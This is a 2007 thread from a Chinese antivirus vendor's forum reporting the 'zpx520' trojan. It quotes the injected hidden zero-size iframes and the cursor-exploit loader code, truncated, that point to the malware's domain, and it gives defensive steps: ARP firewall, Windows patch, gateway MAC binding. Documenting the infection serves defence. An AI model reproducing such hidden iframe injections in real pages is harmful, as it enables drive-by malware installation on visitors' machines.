微点交流论坛

标题: 举报一个恶害木马zpx520，微点对它无视 [打印本页]

作者: runthinker 时间: 2007-7-2 16:49 标题: 举报一个恶害木马zpx520，微点对它无视

转贴，一些关于这个木马的信息：
今天刚把计算机重装了，打开浏览器进入baidu.com的时候，突然我的杀毒软件avast报警有病毒：http://***.com/。右键源代码便看到在第一行多了一行代码。
程序代码程序代码

<iframe src='http://www.zpx520.com/0.ht... width=0 height=0></iframe>

开始自己还以为服务器中招了呢，后来发现很多站点都是这样，初步判断是自己的电脑中招了，而且公司里的电脑都被挂了。

在这个框架代码的页面里面有如下代码
程序代码程序代码

<iframe src='http://www.zpx520.com/0.ht... width=0 height=0>
<HTML>
<BODY style='CURSOR: url(http://q.zpx520.com/w.js)&...
</BODY>
</HTML>
<iframe src="http://q.zpx520.com/1.htm&... width="0" height="0" frameborder="0">
<script src='http://s111.cnzz.com/stat.... language='JavaScript' charset='gb2312'>
<script src='http://s61.cnzz.com/stat.p... language='JavaScript' charset='gb2312'>

这才明白了，这个不就是前两天听人说的光标漏洞吗？所以可以断定Windows平台(HTML ASP、ASP.Net……)的站点都会有这样的问题。而这个马最终会下载一个0.exe的文件用来传播。是熊猫烧香和维金之后的又一个很利害的病毒。

首先这个木马我所知道的现在avast、金山毒霸、卡巴、瑞星都可以查杀，但是杀毒软件是针对你的站点的URL的，不同的URL就会再次跳出警告，这显然很烦。现在说说我的解决方案。

首先去下载一个ARP防火墙，这个光标病毒的幕后是ARP攻击。在你的网络里有一台机器被挟持作为攻击服务器了，并且伪装为路由IP。通过ARP防火墙可以找到这台机器，并且把这台机器搞定（第一就是拔了他的网线）。然后升级杀毒软件（我用的avast）、打上Window的系统补丁（KB932168）。

[ Last edited by Legend on 2007-7-2 at 16:56 ]

作者: runthinker 时间: 2007-7-2 16:49
一些它的信息，希望对你们有帮助

作者: Legend 时间: 2007-7-2 17:02
为了广大网友的安全，请不要在论坛发布可疑网站的链接，请将可疑程序链接发送到virus@micropoint.com.cn ,我们会有专业人员尽心分析处理，谢谢。

作者: Legend 时间: 2007-7-2 17:06
请在微点的传统防火墙中绑定网关MAC地址
请您将该框架页面的完整代码+您的微点具体版本+您想系统版本+您的微点安装文件夹下的MP6文件夹一起复制到桌面并压缩后发送到virus@micropoint.com.cn我们具体分析一下
同时请附上这个帖子的地址

[ Last edited by Legend on 2007-7-2 at 17:50 ]

作者: runthinker 时间: 2007-7-2 17:20
网关的MAC地址我是不知道的

作者: Legend 时间: 2007-7-2 17:40
微点传统防火墙设置，绑定MAC地址功能可以自动查找准确的网关MAC地址，方便用户使用。

作者: runthinker 时间: 2007-7-3 00:19
网关的MAC地址，自动获取不了，好像网关是一台路由器

作者: runthinker 时间: 2007-7-3 00:29
可以获取，用arp - a命令可以获取到，谢谢啦
用微点获不到，管理员可以看看是什么原因

欢迎光临微点交流论坛 (http://bbs.micropoint.com.cn/)

bbs.micropoint.com.cn